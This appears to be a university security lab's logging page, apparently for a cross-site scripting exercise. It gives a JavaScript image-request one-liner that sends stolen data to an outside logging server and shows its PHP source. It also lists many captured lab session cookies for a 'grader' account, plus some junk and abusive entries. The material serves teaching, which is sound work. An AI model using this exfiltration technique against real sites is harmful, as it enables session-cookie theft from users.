You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sun, 23 Nov 2025 04:39:26 +0000: Megurine_Luka: grader#3cf29a17ae6971f37d4f3b562ea8c656 Sun, 23 Nov 2025 04:39:21 +0000: Hatsune_Miku: grader#d6805d4517bfe770b116545478735380 Sun, 23 Nov 2025 04:39:11 +0000: Megurine_Luka: grader#17e0cd4fbc46495c627489444469af7b Sun, 23 Nov 2025 04:38:18 +0000: Megurine_Luka: grader#506ee0766a39f22a178e83f029716f0b Sun, 23 Nov 2025 04:38:13 +0000: Hatsune_Miku: grader#eab746a5306052a0092415f5cddb41a6 Sun, 23 Nov 2025 04:38:04 +0000: Megurine_Luka: grader#ede6b7deb51438e1ee0c7f9100572a47 Sun, 23 Nov 2025 04:37:04 +0000: Megurine_Luka: grader#74c135c0bb29d06f95e8351f9e9c7292 Sun, 23 Nov 2025 04:36:59 +0000: Hatsune_Miku: grader#49cf2a1825b1ac22e2786a2046e2729a Sun, 23 Nov 2025 04:36:50 +0000: Megurine_Luka: grader#945a6f3f5b9fa81ad226ac468f2398ad Sun, 23 Nov 2025 04:32:26 +0000: Megurine_Luka: grader#5bd4cabda2cc5a4dc90faa3a439552e1 Sun, 23 Nov 2025 04:32:21 +0000: Hatsune_Miku: grader#7bba6d673a0e8e9dfc131885d5ccb0a1 Sun, 23 Nov 2025 04:32:12 +0000: Megurine_Luka: grader#a32ce2b71f9f661b5b4077a702d4e0cd Sun, 23 Nov 2025 04:29:55 +0000: Megurine_Luka: grader#5d70fb7a67cbf215c4334dcc92f7b4ea Sun, 23 Nov 2025 04:29:50 +0000: Hatsune_Miku: grader#1239e7d12333289b5bd870c04de59f90 Sun, 23 Nov 2025 04:29:42 +0000: Megurine_Luka: grader#1d20211c74a980b8e97d291bc15859ad Sun, 23 Nov 2025 04:21:54 +0000: Megurine_Luka: grader#c7a045ea06ff66549eb33e9f78cb84e3 Sun, 23 Nov 2025 04:21:49 +0000: Hatsune_Miku: grader#0146d3fab8cea5528f8e4c00d25dbbff Sun, 23 Nov 2025 04:17:55 +0000: Megurine_Luka: grader#391364123443c2d3cd73a81b82e4911b Sun, 23 Nov 2025 04:17:50 +0000: Hatsune_Miku: grader#8fecd72d0835f2b3594b9c561d1b54e7 Sun, 23 Nov 2025 04:17:41 +0000: Megurine_Luka: grader#bc84ebe32c114951dd029ea7073b2151 Sun, 23 Nov 2025 04:11:54 +0000: Megurine_Luka: grader#709bf3b23ee1f3d08d5e35d122c39467 Sun, 23 Nov 2025 04:11:45 +0000: Megurine_Luka: grader#6b20d46dd0acbe7e6c290af733646d3a Sun, 23 Nov 2025 03:59:20 +0000: Megurine_Luka: grader#60b9a116f806ffd93b1fdb76b439901b Sun, 23 Nov 2025 03:58:24 +0000: Megurine_Luka: grader#b0ae9a54293876a6f8187ff3811289ed Sun, 23 Nov 2025 03:54:56 +0000: Megurine_Luka: grader#e165a7e600d52e32e02a19d76e7f76e2 Sun, 23 Nov 2025 03:53:57 +0000: Megurine_Luka: grader#8a8d98d9b23c26b21df6a93607a37f0a Sun, 23 Nov 2025 03:41:43 +0000: Megurine_Luka: grader#fee87f7f10bbf877dab068e020419184 Sun, 23 Nov 2025 03:35:33 +0000: Megurine_Luka: grader#7aec65b98b35ec276cfaa1f77c5efc57 Sun, 23 Nov 2025 03:33:42 +0000: Megurine_Luka: undefined Sun, 23 Nov 2025 03:32:08 +0000: Hatsune_Miku: PyZoobarLogin=grader#fab169a619e5c833f3fd11418a9dc314 Sun, 23 Nov 2025 03:30:33 +0000: Hatsune_Miku: grader#d3db17c9a8b6b4149cc90c7d7f00cb34 Sun, 23 Nov 2025 03:29:30 +0000: Hatsune_Miku: undefined Sun, 23 Nov 2025 03:24:00 +0000: tu_usuario: PyZoobarLogin=grader#28fe21f3d4e674d4ab1504820fd76cda Sun, 23 Nov 2025 03:10:32 +0000: 393939393939: 41414141411414 Sun, 23 Nov 2025 03:10:20 +0000: 23456789o: 456783 Sun, 23 Nov 2025 03:10:10 +0000: 1: kys Sun, 23 Nov 2025 03:10:06 +0000: 1: Sun, 23 Nov 2025 03:09:54 +0000: 1: 23456 Sun, 23 Nov 2025 03:07:50 +0000: tu_usuario: PyZoobarLogin=grader#82c9c5a6acf3565cbce360ffaa546640 Sun, 23 Nov 2025 00:26:33 +0000: cookie_monster: grader/QDSWSZRFRPOK Sun, 23 Nov 2025 00:26:20 +0000: cookie_monster: PyZoobarLogin=grader#9875a062984cea2cd8915514bae977c0 Sun, 23 Nov 2025 00:26:14 +0000: cookie_monster: PyZoobarLogin=grader#5eb6026b2d025526bac05f36da035c59 Sun, 23 Nov 2025 00:26:05 +0000: cookie_monster: PyZoobarLogin=grader#828780cf31f08f472e48047b1277a8eb Sun, 23 Nov 2025 00:22:12 +0000: cookie_monster: PyZoobarLogin=grader#bd96ff5fcfec4fd5c0632fd9640c0c3b Sun, 23 Nov 2025 00:22:06 +0000: cookie_monster: PyZoobarLogin=grader#e2ab256bb4069eb526c15a18b998c72e Sun, 23 Nov 2025 00:21:56 +0000: cookie_monster: PyZoobarLogin=grader#d1a9db6cd6372de17c3dba5eaa842f5a Sun, 23 Nov 2025 00:19:42 +0000: cookie_monster: awsd/awsd Sun, 23 Nov 2025 00:19:14 +0000: cookie_monster: awsd/awsd Sun, 23 Nov 2025 00:18:59 +0000: cookie_monster: awsd/awsd Sun, 23 Nov 2025 00:18:41 +0000: cookie_monster: awsd/awsd Sun, 23 Nov 2025 00:12:34 +0000: cookie_monster: PyZoobarLogin=grader#26f1a18e0d21e07e206e18064018fc61 Sun, 23 Nov 2025 00:12:29 +0000: cookie_monster: PyZoobarLogin=grader#9bbcf850be85bb1dafafef1908a1ce32 Sun, 23 Nov 2025 00:12:19 +0000: cookie_monster: PyZoobarLogin=grader#e21c75790f5f7e401dfe09ee329b5765 Sun, 23 Nov 2025 00:09:52 +0000: cookie_monster: grader/EYEIBUNZVAEZ Sun, 23 Nov 2025 00:09:39 +0000: cookie_monster: PyZoobarLogin=grader#04ea0a032ae125591422c78bcd27c35a Sun, 23 Nov 2025 00:09:33 +0000: cookie_monster: PyZoobarLogin=grader#03f803f7f646868946482271056e4ad9 Sun, 23 Nov 2025 00:09:23 +0000: cookie_monster: PyZoobarLogin=grader#7ef8618c0f96865b555de21865c2a7f4 Sun, 23 Nov 2025 00:08:28 +0000: cookie_monster: PyZoobarLogin=grader#85ea597cacb14b57e1e80a010287d0a9 Sun, 23 Nov 2025 00:08:22 +0000: cookie_monster: PyZoobarLogin=grader#15cdcda4cb1997dc4aff851342308a93 Sun, 23 Nov 2025 00:08:12 +0000: cookie_monster: PyZoobarLogin=grader#68d485bca1087d7bf7a749d342c77eb3 Sun, 23 Nov 2025 00:06:32 +0000: cookie_monster: PyZoobarLogin=grader#a5377b08774f78620721544f4ddb499b Sun, 23 Nov 2025 00:06:26 +0000: cookie_monster: PyZoobarLogin=grader#9381d9daac86e23dd577559a5ade5ad4 Sun, 23 Nov 2025 00:06:16 +0000: cookie_monster: PyZoobarLogin=grader#f8301221ca3b07d1bcb09069d6466e25 Sun, 23 Nov 2025 00:02:58 +0000: cookie_monster: grader/DRSBXRQTRVJL Sun, 23 Nov 2025 00:02:45 +0000: cookie_monster: PyZoobarLogin=grader#c1a5e82c6e0eb952b331b96d771eff0c Sun, 23 Nov 2025 00:02:39 +0000: cookie_monster: PyZoobarLogin=grader#428f640b3ce998f0b18424c48e9c29d3 Sun, 23 Nov 2025 00:02:30 +0000: cookie_monster: PyZoobarLogin=grader#3ddc5f67ea2e2c2fc0793197aea62c6f Sat, 22 Nov 2025 23:55:11 +0000: cookie_monster: PyZoobarLogin=grader#0e4b2a43cdc5313aebac933ad62ac027 Sat, 22 Nov 2025 23:55:06 +0000: cookie_monster: PyZoobarLogin=grader#ee1c63a1f3acb503b509195e19b73ac8 Sat, 22 Nov 2025 23:54:56 +0000: cookie_monster: PyZoobarLogin=grader#b9f7366ff8529b447287eca2bdf21b51 Sat, 22 Nov 2025 23:51:38 +0000: cookie_monster: PyZoobarLogin=grader#259d13528c0d0b8d4215782ff2cf9865 Sat, 22 Nov 2025 23:51:33 +0000: cookie_monster: PyZoobarLogin=grader#5bf7312858262c39746d87c9e1b6a466 Sat, 22 Nov 2025 23:51:23 +0000: cookie_monster: PyZoobarLogin=grader#a434cc057e752d2f588fd9756d85a936 Sat, 22 Nov 2025 23:49:19 +0000: cookie_monster: PyZoobarLogin=grader#d8755e9eb2ac83a5e18b7a7d068d11a8 Sat, 22 Nov 2025 23:49:13 +0000: cookie_monster: PyZoobarLogin=grader#8876e56b8d9bebf05b9b11505d767a1a Sat, 22 Nov 2025 23:49:04 +0000: cookie_monster: PyZoobarLogin=grader#be042004d6e0646871c6870332ae5797 Sat, 22 Nov 2025 23:39:36 +0000: cookie_monster: PyZoobarLogin=grader#e4d12595916704c28c4ee87b4dde0aff Sat, 22 Nov 2025 23:39:31 +0000: cookie_monster: PyZoobarLogin=grader#09031c9f52d4db88847cf32a33feab12 Sat, 22 Nov 2025 23:39:21 +0000: cookie_monster: PyZoobarLogin=grader#4dd17b72639563ba00d5ba2503715e8c Sat, 22 Nov 2025 23:37:02 +0000: cookie_monster: PyZoobarLogin=grader#dc194669b467d6f5f2baf6e62ea1dc0d Sat, 22 Nov 2025 23:36:56 +0000: cookie_monster: PyZoobarLogin=grader#cd93de614c1196cd837ed09184c44179 Sat, 22 Nov 2025 23:36:46 +0000: cookie_monster: PyZoobarLogin=grader#c400b18910367be1e81a73acc28262a3 Sat, 22 Nov 2025 23:35:05 +0000: cookie_monster: PyZoobarLogin=grader#ad56fcdc323ce28cf04c616e918541e4 Sat, 22 Nov 2025 23:34:59 +0000: cookie_monster: PyZoobarLogin=grader#4eeddd9edaecfd0d225faf3a80497569 Sat, 22 Nov 2025 23:34:49 +0000: cookie_monster: PyZoobarLogin=grader#9b38fa23ac64f599513d08372a88b7ba Sat, 22 Nov 2025 23:33:13 +0000: cookie_monster: PyZoobarLogin=grader#7ac2f3d7f52a1e99062d6d7d259f233a Sat, 22 Nov 2025 23:33:08 +0000: cookie_monster: PyZoobarLogin=grader#93cab7b91ab7e5c9f1051ede9646f822 Sat, 22 Nov 2025 23:32:58 +0000: cookie_monster: PyZoobarLogin=grader#289ea2e6e8c0b7d62db53320ac9bb4d7 Sat, 22 Nov 2025 23:31:02 +0000: cookie_monster: PyZoobarLogin=grader#abf2dd96fa00b140bc72a24ec12a0f30 Sat, 22 Nov 2025 23:30:57 +0000: cookie_monster: PyZoobarLogin=grader#2baffe2f5d9632bba3018c0d6f31c34a Sat, 22 Nov 2025 23:30:47 +0000: cookie_monster: PyZoobarLogin=grader#fb08a1af589b1dc725f4bdaee8db170f Sat, 22 Nov 2025 23:27:49 +0000: cookie_monster: PyZoobarLogin=grader#6581b6a1e317f8076f4f84bc9577dd82 Sat, 22 Nov 2025 23:27:43 +0000: cookie_monster: PyZoobarLogin=grader#ff899ab5b83d5bd0a996083e8e41ef87 Sat, 22 Nov 2025 23:27:33 +0000: cookie_monster: PyZoobarLogin=grader#35524a0dee005c3cb7c5c7ad4b55e7cb Sat, 22 Nov 2025 23:24:46 +0000: cookie_monster: PyZoobarLogin=grader#78fc036086f81c8b16f6cb86b1d461b8 Sat, 22 Nov 2025 23:24:42 +0000: cookie_monster: PyZoobarLogin=grader#8a7071e96a8e5c15f96172761c84a67c Sat, 22 Nov 2025 23:24:32 +0000: cookie_monster: PyZoobarLogin=grader#af4aed1efc649de4da9c6ffc41de2c46 Sat, 22 Nov 2025 23:20:03 +0000: cookie_monster: PyZoobarLogin=grader#9dc244beeb0b80da1d5869180c9e6669 Sat, 22 Nov 2025 23:19:57 +0000: cookie_monster: PyZoobarLogin=grader#6c26f539c27d4a4d391cdd2a62641e25 Sat, 22 Nov 2025 23:19:48 +0000: cookie_monster: PyZoobarLogin=grader#853715f07806323ac5089fe9e05d4d87 Sat, 22 Nov 2025 23:14:40 +0000: cookie_monster: PyZoobarLogin=grader#e8d66a6c2934e115c52e12a536cf7aa2
In case you are curious, here is the source code of this page.
<?php do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.858-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>